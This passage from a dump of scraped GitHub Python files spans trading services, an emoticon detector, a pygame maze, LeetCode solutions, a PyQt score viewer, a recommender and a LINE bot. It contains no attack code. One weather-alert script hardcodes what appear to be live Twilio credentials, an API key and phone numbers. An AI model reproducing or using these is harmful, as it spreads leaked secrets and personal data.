self.PLFundsRiskRepository.fetch_all()\n if len(plfundsrisks) == 0:\n raise DataNotFoundException(f\"PLFundsRisk data not found\")\n # return [PLFundsRiskSchema(**record.__dict__) for record in plfundsrisks]\n return jsonable_encoder(plfundsrisks)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\nclass AlgoPLDateSummary:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.PLDateSummaryRepository = None\n\n async def async_init(self):\n self.PLDateSummaryRepository = await get_PLDateSummaryRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_pldatesummarys_data(self, date):\n try:\n pldatesummarys = await self.PLDateSummaryRepository.fetch_by_date(date)\n if len(pldatesummarys) == 0:\n raise DataNotFoundException(f\"PLDateSummary data not found : {date}\")\n # return [PLDateSummarySchema(**record.__dict__) for record in pldatesummarys]\n return jsonable_encoder(pldatesummarys)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\n async def get_pldatesummarys_all(self):\n try:\n pldatesummarys= await self.PLDateSummaryRepository.fetch_all()\n if len(pldatesummarys) == 0:\n raise DataNotFoundException(f\"PLDateSummary data not found\")\n # return [PLDateSummarySchema(**record.__dict__) for record in pldatesummarys]\n return jsonable_encoder(pldatesummarys)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\nclass AlgoTrade:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.algoBroker = AlgoBroker(self.broker, self.userid)\n\n async def async_init(self):\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def entry(self,order):\n tradeDetails = {}\n mainOrderDetails = await self.algoBroker.create_order(order)\n # if mainOrderDetails is not None:\n # print(mainOrderDetails)\n\n # slOrderDetails = await self.algoBroker.create_order(order)\n # if slOrderDetails is not None:\n # print(slOrderDetails)\n #\n # tgOrderDetails = await self.algoBroker.create_order(order)\n # if tgOrderDetails 
is not None:\n # print(tgOrderDetails)\n\n return mainOrderDetails\n\n async def exit(self,order):\n exitDetails = self.algoBroker.create_order(order)\n return exitDetails\n\n\nclass AlgoUser():\n def __init__(self, broker, userid):\n self.broker = broker\n self.userid = userid\n\n async def execute_signals(self,signallist):\n algoSpread = await AlgoSpread(self.broker,self.userid)\n\n for signal in signallist:\n await log_with_bot('i', f'signal : {signal}')\n\n resp = await algoSpread.create_naked_spread(signal)\n print(resp)\n\n\n\n # spread = await algoSpread.create_credit_spread(signal)\n #\n # # activeSpreads = await self.algoSpread.get_spreads_data(signal)\n # # for spread in activeSpreads:\n # # print(spread)\n\n\n\n","repo_name":"lohithkg/AlgoAPI_User","sub_path":"services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":22954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33240245698","text":"#-*-coding:utf-8-*-\nimport re\n\nmetachr = '^$*+?{}[]\\|()'\n\nheads = u'''>ζↁ━இㅇ(┌/∑┐ψ〒ʕ└⊙<√=☜ㄟ〠Σ•ತ✧╰(*-/☮Oε┴‷〈ಸ爻<︿乁♡bˋ⁄ˇఠ◉ಠ○vm#◎⇎Ψmb◔♀ⶸლ\\。 ̄◢づ‧≧흫…╭o╮ჰ≡癶凸~ヽヾ'''\ntails = u'''ↁノ「↑̖〠ิ▽♀⁄ˇ◣~⑤╮凵︿・|━)dʔಠ√ತ'+/°3ืಸ;?ξツఠm﹏◎\"⇎。≡╩╭oჴஇ☆┌з┐〒↗⊙☮☞•…*.┴:\︴♡σ♂d○●Z ̄b≦♪╬╰癶>シ~#〉3↘┛”;!✧)Ψ-ⶸ=_ㅇψˊノ◔ლaづ╧흫m╯y凸'''\nfor i in metachr:\n heads = heads.replace(i, '\\\\'+i)\n tails = tails.replace(i, '\\\\'+i)\n\n\ndef ensure_unicode(string):\n if not isinstance(string, unicode):\n try:\n string = string.decode('utf-8')\n except:\n raise UnicodeError('Input should be UTF8 or UNICODE')\n return string\n\ndef clear_num(txt):\n num_pat = re.compile(u'''([0-9\\-.:/]{2,})''')\n res = num_pat.sub('', txt)\n return res\n\ndef post_check(candlst):\n con = []\n for i in candlst:\n while True:\n i_mod = i.strip()\n i_mod = re.sub(u'\\([一-龥]{1,}[\\)]{0,1}', '', i_mod)\n i_mod = re.sub(u'([一-龥]{1,})', '', i_mod)\n if len(set(i_mod)) < 3:\n break\n else:\n if re.search(u'^m:[0-9a-zA-Z一-龥]', i_mod): # m:大大\n break\n elif re.search(u'^~[0-9a-zA-Z一-龥]', i_mod): #~4次\n break\n elif i_mod == i:\n con.append(i_mod)\n break\n else:\n i = i_mod \n continue\n return con\n\ndef exclude_cht(txt):\n pat = re.compile(u'''(?!.*[.a-zA-Z][.a-zA-Z])([一-龥][一-龥]{2,})''')\n while True:\n res = pat.sub('', txt)\n if res == txt:\n return res\n else:\n txt = res\n exclude_cht(txt)\n\ndef find_emo(txt, source=False):\n txt = ensure_unicode(txt)\n txt_mod = clear_num(txt)\n txt_mod = exclude_cht(txt_mod)\n emo_pat = re.compile(u'''(?!.*[.a-zA-Z][.a-zA-Z])([%s].{3,})''' % heads)\n res = emo_pat.findall(txt_mod)\n res = post_check(res)\n res = [i for i in res if i in txt]\n if source == True:\n for x in res:\n txt = txt.replace(x, ''+x+'') \n return (res,txt)\n return res\n\n","repo_name":"amigcamel/Jseg","sub_path":"jseg/Emodet/emodet2.py","file_name":"emodet2.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"68"} +{"seq_id":"37517240716","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*\nimport pygame\nfrom pygame.locals import *\nfrom classes import *\nfrom constantes import *\n#boucle jeu, ecran, accueil, init()\n\npygame.init()\nfenetre=pygame.display.set_mode((450,450),FULLSCREEN)\nfond = pygame.image.load(image_accueil).convert()\nfenetre.blit(fond,(0,0))\npygame.display.flip()\ncontinuer=1\nmenu=1\njouer=1\nniveau=0\nchoix=0\narrivee=[]\nwhile continuer:\n while menu:\n pygame.time.Clock().tick(30)\n for event in pygame.event.get():\n if event.type==QUIT or (event.type==KEYDOWN 
and event.key==K_ESCAPE):\n menu=0\n continuer=0\n jouer=0\n elif event.type == KEYDOWN:\n if event.key == K_F1:\n \n choix = \"n1\"\n elif event.key == K_F2:\n \n choix = \"n2\"\n \n if choix!=0: \n niveau = Niveau(choix)\n niveau.generer()\n fenetre=niveau.affichage()\n menu=0\n depart=niveau.depart()\n arrivee=niveau.arrivee()\n dk=Joueur(depart[0],depart[1])\n fenetre.blit(dk.dk,(dk.pos_x*30,dk.pos_y*30))\n\n while jouer:\n pygame.display.flip()\n pygame.time.Clock().tick(30)\n if arrivee[0]==dk.pos_x and arrivee[1]==dk.pos_y:\n continuer=0\n print(\"Vous avez gagné\")\n jouer=0\n for event in pygame.event.get():\n if event.type==QUIT:\n jouer=0\n continuer=0\n if event.type==KEYDOWN:\n if event.key==K_UP and dk.pos_y>0 and niveau.structure[dk.pos_x][dk.pos_y-1]!=\"m\":\n dk.up()\n elif event.key==K_DOWN and dk.pos_y<14 and niveau.structure[dk.pos_x][dk.pos_y+1]!=\"m\":\n dk.down()\n elif event.key==K_LEFT and dk.pos_x>0 and niveau.structure[dk.pos_x-1][dk.pos_y]!=\"m\":\n dk.left()\n elif event.key==K_RIGHT and dk.pos_x<14 and niveau.structure[dk.pos_x+1][dk.pos_y]!=\"m\":\n dk.right()\n fenetre=niveau.affichage()\n fenetre.blit(dk.dk,(dk.pos_x*30,dk.pos_y*30))\n \n","repo_name":"tsalmon/labyrinthe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38029613085","text":"# https://leetcode.com/problems/count-items-matching-a-rule/\n\nclass Solution:\n def countMatches(self, items: List[List[str]], ruleKey: str, ruleValue: str) -> int:\n \n rule_index = {\n \"type\" : 0,\n \"color\" : 1,\n \"name\" : 2\n }\n \n condition = rule_index[ruleKey]\n \n count = 0\n for rows in items:\n if rows[condition] == ruleValue:\n count += 1\n\n return count\n","repo_name":"HunkWhoCodes/LeetCodeSolutions","sub_path":"PythonSolutions/1773-CountItemsMatchingARulesolution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"3619902429","text":"def insertionSort(array):\n\n for step in range(1, len(array)):\n key = array[step]\n j = step - 1\n \n while j >= 0 and key < array[j]:\n array[j + 1] = array[j]\n j = j - 1\n \n array[j + 1] = key\n\n\ndata = [int(input(\"Enter a number: \")) for i in range(int(input(\"Enter the size of the array: \")))]\n\nprint(\"Unsorted array: \", data)\ninsertionSort(data)\nprint('Sorted Array in Ascending Order:')\nprint(data)","repo_name":"subhashishnabajja/college-code","sub_path":"fy/sem-2/Algorithm/practical-5/insertion-sort.py","file_name":"insertion-sort.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"1008151840","text":"# import python modules\nimport glob\nfrom threading import Timer\nfrom time import sleep, time\nfrom random import randrange\nimport sys\n\n# import PyQt5 modules (universal with PySide2)\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import pyqtSlot as Slot\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton\n\n# import project modules\nfrom score import ScoreDev\n# from ../audioEngine import Audio_engine\n\n\nclass MainApplication(QWidget):\n\n def __init__(self):\n QWidget.__init__(self)\n # is unity running the notation png's?\n self.unity_score = True\n\n # set vars and params\n self.running = True\n\n self.score_dict = {\"top_left\": 
{\"time\": time(), \"image\": None},\n \"top_right\": {\"time\": time(), \"image\": None},\n \"bottom_left\": {\"time\": time(), \"image\": None},\n \"bottom_right\": {\"time\": time(), \"image\": None}}\n\n self.score_dict_list = [\"top_left\",\n \"top_right\",\n \"bottom_left\",\n \"bottom_right\"]\n\n # generate the ML score images\n # todo - find better solution for changing global font colour\n # todo - current solution was to change color in brown/core/stem.py\n # and brown/constants.py\n score = ScoreDev()\n\n # start the audio listener thread\n # self.audiobot = Audio_engine()\n\n # UI setup and off we go\n self.title = 'Nautilus'\n self.left = 10\n self.top = 10\n self.width = 320\n self.height = 200\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n # create all labels\n if self.unity_score:\n # create a start button\n self.start_button = QPushButton(\"START\", self)\n self.start_button.setCheckable(True)\n self.start_button.toggle()\n self.start_button.move(100, 70)\n\n # adding action to the button\n self.start_button.clicked.connect(self.start_score)\n\n # and off we go\n self.show()\n\n else:\n # owns the images that were produced by the scorebot\n self.image_files = glob.glob('data/images/*.png')\n\n # create labels\n self.createLabels()\n\n # and off we go\n self.gui_thread = None\n self.update_gui()\n\n @Slot()\n def start_score(self):\n if not self.start_button.isChecked():\n print(\"Starting\")\n self.start_button.setText(\"STOP\")\n self.audiobot.go_bang = True\n else:\n print(\"Stopping\")\n self.audiobot.go_bang = False\n self.audiobot.running = False\n self.start_button.setText(\"START\")\n # todo - close down all other funcs & threads\n sleep(1)\n print(\"bye bye\")\n self.running = False\n\n # update the GUI and check the quad images\n def update_gui(self):\n # print(\"-------- updating gui\")\n while self.running:\n self.update()\n self.updateImage()\n self.gui_thread = Timer(0.1, self.update_gui)\n self.gui_thread.start()\n\n def createLabels(self):\n screen_resolution = self.geometry()\n height = screen_resolution.height()\n width = screen_resolution.width()\n\n # widget params\n self.setGeometry(100, 100, 900, 700)\n\n # creating a label widget\n self.top_left_label = QLabel(self)\n\n # moving position\n self.top_left_label.move(0, 0)\n\n # setting up border\n self.top_left_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.top_left_label.resize(width / 2, height / 2)\n\n # creating a label widget\n self.top_right_label = QLabel(self)\n\n # moving position\n self.top_right_label.move(width / 2, 0)\n\n # setting up border\n self.top_right_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.top_right_label.resize(width / 2, height / 2)\n\n # creating a label widget\n self.bottom_left_label = QLabel(self)\n\n # moving position\n self.bottom_left_label.move(0, height / 2)\n\n # setting up border\n self.bottom_left_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.bottom_left_label.resize(width / 2, height / 2)\n\n # creating a label widget\n self.bottom_right_label = QLabel(self)\n\n # moving position\n self.bottom_right_label.move(width / 2, height / 2)\n\n # setting up border\n self.bottom_right_label.setStyleSheet(\"border: 1px solid black;\")\n\n # resizing the widget\n self.bottom_right_label.resize(width / 2, height / 2)\n\n def updateImage(self):\n # check the status of each 
quad\n        for quad in self.score_dict_list:\n            t = self.score_dict[quad][\"time\"]\n\n            # for key, value in self.score_dict.items():\n            # if times up then change image in quadrant\n            if t < time():\n                file = self.image_files[randrange(len(self.image_files))]\n                image_duration = t + (float(file[-7:-4]) * (randrange(2, 20)))\n                # self.score_dict[key] = image_duration\n                self.score_dict[quad][\"time\"] = image_duration\n                # print(\"here\", quad)\n\n                # set the new image to a pixmap and put into quad\n                self.pixmap = QPixmap(file)\n                if quad == \"top_left\":\n                    self.top_left_label.setPixmap(self.pixmap)\n                elif quad == \"top_right\":\n                    self.top_right_label.setPixmap(self.pixmap)\n                elif quad == \"bottom_left\":\n                    self.bottom_left_label.setPixmap(self.pixmap)\n                else:\n                    self.bottom_right_label.setPixmap(self.pixmap)\n\nimport numpy as np  # used by NoteTokenizer.transform below; this import was missing\n\n\"\"\"this is here for access from elsewhere\nand is written into the note-tokeniser file\"\"\"\nclass NoteTokenizer:\n    def __init__(self):\n        self.notes_to_index = {}\n        self.index_to_notes = {}\n        self.num_of_word = 0\n        self.unique_word = 0\n        self.notes_freq = {}\n\n    def transform(self, list_array):\n        \"\"\" Transform a list of notes in string form into indices.\n\n        Parameters\n        ==========\n        list_array : list\n            list of notes in string format\n\n        Returns\n        =======\n        The transformed list as a numpy array.\n\n        \"\"\"\n        transformed_list = []\n        for instance in list_array:\n            transformed_list.append([self.notes_to_index[note] for note in instance])\n        return np.array(transformed_list, dtype=np.int32)\n\n    def partial_fit(self, notes):\n        \"\"\" Partial fit on the dictionary of the tokenizer\n\n        Parameters\n        ==========\n        notes : list of notes\n\n        \"\"\"\n        for note in notes:\n            note_str = ','.join(str(a) for a in note)\n            if note_str in self.notes_freq:\n                self.notes_freq[note_str] += 1\n                self.num_of_word += 1\n            else:\n                self.notes_freq[note_str] = 1\n                self.unique_word += 1\n                self.num_of_word += 1\n                self.notes_to_index[note_str], self.index_to_notes[self.unique_word] = self.unique_word, note_str\n\n    def add_new_note(self, note):\n        \"\"\" Add a new note into the dictionary\n\n        Parameters\n        ==========\n        note : str\n            a new note that is not yet in the dictionary.\n\n        \"\"\"\n        assert note not in self.notes_to_index\n        self.unique_word += 1\n        self.notes_to_index[note], self.index_to_notes[self.unique_word] = self.unique_word, note\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    image_viewer = MainApplication()\n    # image_viewer.showFullScreen()\n    # image_viewer.show()\n    sys.exit(app.exec_())\n","repo_name":"DigiScore/nautilus","sub_path":"makeScore/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21577990040","text":"\"\"\"\nAruru the turtle is going to attend N classes today.\nIt is now time 0, and class i starts at time Li and ends at time Ri. The travel time between classes may be taken as 0, but entering a class late or leaving it early is not allowed.\nCan Aruru attend all N classes?\n\"\"\"\n\nN = int(input())\n\ntime_table = []\nfor i in range(N):\n    L, R = map(int, input().split())\n    time_table.append((L, R))\n\ntime_table.sort(key=lambda x:x[0])\n\nflg = True\n\nfor i in range(1, N):\n    # after sorting by start time, there is a clash iff the previous class ends after the next one starts\n    if time_table[i-1][1] > time_table[i][0]:\n        flg = False\n        break\n\nif flg:\n    print(\"Yes\")\nelse:\n    print(\"No\")\n    \n","repo_name":"yuji-sgs/algo-style","sub_path":"ソートアルゴリズム/ソートを活用する問題/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12212171374","text":"from app import myDb\nfrom collections import defaultdict\nfrom surprise import Reader\nfrom surprise import SVD\nfrom surprise import Dataset\nfrom surprise import NormalPredictor\nfrom surprise.model_selection import cross_validate\nimport pandas as pd\n\ndb = myDb['users']\n\nclass Recommand():\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def get_top_n(predictions, n):\n        top_n = defaultdict(list)\n        for uid, iid, true_r, est, _ in predictions:\n            top_n[uid].append((iid, est))\n        for uid, user_ratings in top_n.items():\n            user_ratings.sort(key=lambda x: x[1], reverse=True)\n            top_n[uid] = user_ratings[:n]\n\n        return top_n\n\n    def gen_matrix(self):\n        itemList = []\n        userList = []\n        ratingList = []\n        result = db.find({})\n        for i in result:\n            if 'rate_map' in i:\n                keysList = i['rate_map'].keys()\n                for k in keysList:\n                    itemList.append(k)\n                    userList.append(i['username'])\n                    ratingList.append(i['rate_map'][k])\n        ratings_dict = {'itemID': itemList,\n                        'userID': userList,\n                        'rating': ratingList}\n        df = pd.DataFrame(ratings_dict)\n\n        reader = Reader(rating_scale=(1, 10))\n\n        data = Dataset.load_from_df(df[['userID', 'itemID', 'rating']], reader)\n        # cross_validate does its own k-fold splitting, so no separate split step is needed\n        cross_validate(NormalPredictor(), data, cv=5, measures=['RMSE', 'MAE'], verbose=True)\n        trainset = data.build_full_trainset()\n        algo = SVD()\n        algo.fit(trainset)\n        print(trainset)\n        testset = trainset.build_anti_testset()\n        predictions = algo.test(testset)\n        print(predictions)\n        for i in predictions:\n            print(i)\n        return predictions\n","repo_name":"kingry1/book-pybackend","sub_path":"app/recommend/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21369082014","text":"import gzip\nimport shutil\n\n\nclass Tools:\n\n    @staticmethod\n    def gzip_file(output_path):\n        gz_file_name = '%s.gz' % output_path\n        try:\n            with open(output_path, 'rb') as f_in, gzip.open(gz_file_name, 'wb') as f_out:\n                shutil.copyfileobj(f_in, f_out)\n            return gz_file_name\n        except Exception as e:\n            raise Exception(\"Error when compressing to gz file: \" + str(e))","repo_name":"Pangpang2/Python","sub_path":"worker/Reversion/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10011622313","text":"# Approach 1: Two Pointers\nclass Solution1:\n    def threeSumClosest(self, nums: list[int], target: int) -> int:\n        diff = float(\"inf\")\n        nums.sort()\n        for i in range(len(nums)):\n            lo, hi = i + 1, len(nums) - 1\n            while lo < hi:\n                sum = nums[i] + nums[lo] + nums[hi]\n                if abs(target - sum) < abs(diff):\n                    diff = target - sum\n                if sum < target:\n                    lo += 1\n                else:\n                    hi -= 1\n            if diff == 0:\n                break\n        return target - diff\n\n\n# Approach 2: Binary Search\nclass Solution2:\n    def threeSumClosest(self, nums: list[int], target: int) -> int:\n        pass\n        # diff = float('inf')\n        # nums.sort()\n        # for i in range(len(nums)):\n        #     for j in range(i + 1, len(nums)):\n        #         complement = target - nums[i] - nums[j]\n        #         hi = bisect_right(nums, complement, j + 1)\n        #         lo = hi - 1\n        #         if hi < len(nums) and abs(complement - nums[hi]) < abs(diff):\n        #             diff = complement - nums[hi]\n        #         if lo > j and abs(complement - nums[lo]) < abs(diff):\n        #             diff = complement - nums[lo]\n        #         if diff == 0:\n        #             break\n        # return target - diff\n\n\n# works for any k, not only for 3\nclass Solution:\n    def threeSumClosest(self, nums: list[int], target: int) -> int:\n        nums.sort()\n        return self.KSumClosest(nums, 3, target)\n\n    def KSumClosest(self, nums: 
list[int], k: int, target: int):\n N = len(nums)\n if N == k:\n return sum(nums[:k])\n\n # target too small\n current = sum(nums[:k])\n if current >= target:\n return current\n\n # target too big\n current = sum(nums[-k:])\n if current <= target:\n return current\n\n if k == 1:\n return min([(x, abs(target - x)) for x in nums], key=lambda x: x[1])[0]\n\n closest = sum(nums[:k])\n for i, x in enumerate(nums[:-k+1]):\n if i > 0 and x == nums[i-1]:\n continue\n current = self.KSumClosest(nums[i+1:], k-1, target - x) + x\n if abs(target - current) < abs(target - closest):\n if current == target:\n return target\n else:\n closest = current\n\n return closest\n","repo_name":"open222333/Other-LeetCode","sub_path":"Python/0016-3SumClosest.py","file_name":"0016-3SumClosest.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70453984538","text":"import requests\r\nfrom twilio.rest import Client \r\naccount_sid = \"AC1007642f283b0b51322868141f2ef45d\"\r\nauth_token = \"8639a38efcfd8a1f39829aca36b65826\"\r\n\r\nmy_lat = 23.138639\r\nmy_lon = 72.536471\r\napi_key = \"74bcdf7e1bd33be6575e1060b8bcd0a5\"\r\nurl = \"https://api.openweathermap.org/data/2.5/weather\"\r\nrain_params = {\r\n \"lat\":my_lat,\r\n \"lon\":my_lon,\r\n \"appid\":api_key,\r\n}\r\nresponses = requests.get(url,params=rain_params)\r\ndata = responses.json()['weather'][0]['main']\r\nprint(data)\r\nclient1 = Client(account_sid,auth_token)\r\nmessage = client1.messages.create(\r\n to = '+919426380974',\r\n from_ = '+13862516407',\r\n body=f'''PYTHON SEND MESSAGE\r\n CURRENT WEATHER = \"{data}\"'''\r\n)\r\nprint(message.sid)","repo_name":"ShubhamHaraniya/Python-Basic-Project","sub_path":"14. Weather_Alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18093358781","text":"from .initialize_firebase import db\nfrom .community_data import ListUsers\nfrom google.cloud import firestore\n\n\ndef CreateCommunity(document_id, user_uid, description=\"the lemonest of societies\",\n categories=['lemon', ]): # (name of community, admin user_id)\n document_ref = db.collection('community').document(document_id)\n data = {\"Description\": description, \"Name\": document_id, \"categories\": categories}\n\n member_subcollection = document_ref.collection('members')\n member_data = {'admin': [user_uid, ], 'muted': []}\n subdocument_ref = member_subcollection.document('members')\n subdocument_ref.set(member_data)\n\n document_ref.set(data)\n if document_ref.id:\n print('Document created successfully.')\n else:\n print('Failed to create document.')\n\n\ndef EditCommunity(document_id, uid, option=None, arg=None):\n print('---list roles---')\n userlist = ListUsers(document_id)\n if uid in userlist['admin']:\n print(f'{uid} is authorized')\n else:\n if option == 'MESSAGE': # send message (arg) to channel\n document_path = f'community/{document_id}/channels/channel-1/chat/messages'\n\n # Update append message to messages\n db.document(document_path).update({\n # ` is required around message-list, why? 
...idk ask google\n '`message-list`': firestore.ArrayUnion([{'message': arg, 'uid': uid}])\n })\n else:\n print('unauthorized')\n exit()\n if option == 'ADD': # add channel\n document_ref = db.collection('community').document('channels')\n\n # Create a new document within the channels subcollection\n channel_doc_ref = document_ref.document(arg)\n channel_doc_ref.set({})\n\n # Create the chat subcollection within the channel\n chat_subcollection_ref = channel_doc_ref.collection('chat')\n chat_subcollection_ref.set({})\n\n # Create the messages document within the chat subcollection\n chat_document_ref = chat_subcollection_ref.document('messages')\n chat_data = {'message-list': []}\n chat_document_ref.set(chat_data)\n\n\n elif option == 'DELETE': # delete channel\n # Specify the document path\n document_path = f'community/{document_id}/channels/{arg}'\n\n # Delete the channel\n db.document(document_path).delete()\n elif option == 'MESSAGE':\n pass\n else:\n print('invalid option')\n\n# CreateCommunity(\"Lemon society\", '123')\ndef test():\n EditCommunity('Lemon society', '123', 'add', 'Ice')\n","repo_name":"TheHuntsman4/Hack_Overflow","sub_path":"backend/api/firebase_functions/create_community.py","file_name":"create_community.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6027799568","text":"\"\"\"\nImplementation of a python program to create a binary tree\nwhen the inOrder and PreOrder traversals of the tree are given.\n\"\"\"\n\n# Class to create a tree node\nclass Node:\n\n def __init__(self, data):\n\n # Contains data and link for both child nodes\n self.data = data\n\n self.left = None\n\n self.right = None\n\n# Function to print the preorder traversal of a tree, once created\ndef printPreOrder(root):\n\n # If the tree exists\n if root:\n\n # Print the data\n print(root.data, end = \" \")\n\n # Traverse left subtree\n printPreOrder(root.left)\n\n # Traverse right subtree\n printPreOrder(root.right)\n\n\"\"\"\nCreation of the Tree from inOrder and level order traversals\n\"\"\"\ndef buildTree(inOrder, levOrder):\n\n # If inorder is there (traversal remains in subtree)\n if inOrder:\n\n # Traversing through the level order\n for i in range(len(levOrder)):\n\n # If we find required node to add just create a node\n # and store its value then break the further iteration\n if levOrder[i] in inOrder:\n\n node = Node(levOrder[i])\n\n inIndex = inOrder.index(levOrder[i])\n\n break\n\n # Do the same for left and right childs of the node\n node.left = buildTree(inOrder[:inIndex], levOrder)\n\n node.right = buildTree(inOrder[inIndex+1:len(inOrder)], levOrder)\n\n # Return the node to it's predecessor\n return node\n\n# The main function\ndef main():\n\n # Input the inorder traversal of the tree\n inOrder = list(map(int, input().split()))\n\n # Input the level order traversal of the tree\n levOrder = list(map(int, input().split()))\n\n # Call the function to build the tree\n root = buildTree(inOrder, levOrder)\n\n # Returning the root of the created Binary Tree\n return root\n\n# The driver code\nif __name__ == '__main__':\n\n # Calling the main function to create and return the tree\n root = main()\n\n # print the preorder traversal of the created tree\n 
printPreOrder(root)\n","repo_name":"gourav287/Codes","sub_path":"BinaryTree/TreeCreation/CreateCompleteBinaryTreeByInorderAndLevelOrder.py","file_name":"CreateCompleteBinaryTreeByInorderAndLevelOrder.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"70010937816","text":"########################################################\n#### 2D Lists & Nested Loops ####\n########################################################\n\n\nnumber_grid = [\n \n [1, 2, 3], # each one of these is lists within a list. aka rows and columns in a grid like structure \n [4, 5, 6],\n [7, 8, 9],\n [0] \n \n ]\n\n# print(number_grid[index for row][index for the column])\n\nprint(number_grid[2][1]) ; # this would print 8 - why?\n\n# well remember, indexes start at 0 in Python.\n# so, first row (1,2,3) is index 0, likewise first column (1,4,7,0) is index 0 .\n# so, the number 8, in the grid, belongs to 3rd row (indexed as 2) and 2nd column (indexed as 1) \n\n##########################################################################################################\n\n# Nested for loops are basically for loops inside a for loop \n\nfor row in number_grid :\n for col in row:\n \n print(col) ; # prints all numbers out to the console, across the number grid \n \n ","repo_name":"collid1502/Udemy-Learn-Python-Masterclass","sub_path":"2. Program Flow Control in Python/2D Lists & Nested loops.py","file_name":"2D Lists & Nested loops.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25599373264","text":"# https://github.com/line/line-bot-sdk-python\nfrom google.cloud import datastore\nfrom flask import Flask, request, abort, redirect\nfrom linebot import LineBotApi, WebhookHandler\nfrom linebot.exceptions import InvalidSignatureError, LineBotApiError\nfrom linebot.models import MessageEvent, TextMessage, TextSendMessage, StickerMessage\nimport os\nimport re\nimport config\n\napp = Flask(__name__)\n\nurl_github = \"https://github.com/dr666m1/project_shiki_cast_bot\"\nline_bot_api = LineBotApi(config.token)\nhandler = WebhookHandler(config.secret)\nclient = datastore.Client()\n\n@app.route(\"/\")\ndef github():\n return redirect(url_github)\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body) # output log to stdout\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. 
Please check your channel access token/channel secret.\")\n abort(400)\n return 'OK'\n\ndef send_message(event, msg=None):\n if msg is None:\n msg = '何かお困りですか?\\n使い方は説明書をご確認ください。\\n\\n{}\\n\\n※環境によってはView all of README.mdを押さないと全文表示されません。'.format(url_github)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=msg)\n )\n\nupsert_message = [\n \"【{}】さん推しなんですね!\\n出演が決まったら連絡します。\",\n \"【{}】さん推しやめるんですね?\\n気が変わったら教えてください。\",\n]\n\ndef upsert_fan(event, key_user, cast):\n entity_user = client.get(key_user)\n if entity_user is None:\n entity_user = datastore.Entity(key=key_user)\n favorites = [cast]\n message = 0\n else:\n favorites_prev = entity_user[\"favorites\"]\n if cast in favorites_prev:\n favorites = [x for x in favorites_prev if x != cast]\n message = 1\n else:\n favorites = favorites_prev + [cast]\n message = 0\n entity_user.update({\n \"favorites\": favorites\n })\n client.put(entity_user)\n send_message(event, upsert_message[message].format(cast))\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_text_message(event):\n text = re.sub(\"[  ]\", \"\", event.message.text) # delete space\n user_id = event.source.user_id\n if 2 <= len(event.message.text.split(\"\\n\")):\n send_message(event)\n else:\n key_cast = client.key(\"Cast\", text)\n entity_cast = client.get(key_cast)\n if entity_cast is None:\n send_message(event, \"【{}】さんは知らないです...\\nごめんなさい!\".format(text))\n else:\n key_user = client.key(\"Fan\", user_id)\n upsert_fan(event, key_user, key_cast.name)\n\n@handler.add(MessageEvent, message=StickerMessage)\ndef handle_sticker_message(event):\n key_user = client.key(\"Fan\", event.source.user_id)\n entity_user = client.get(key_user)\n try:\n favorites = 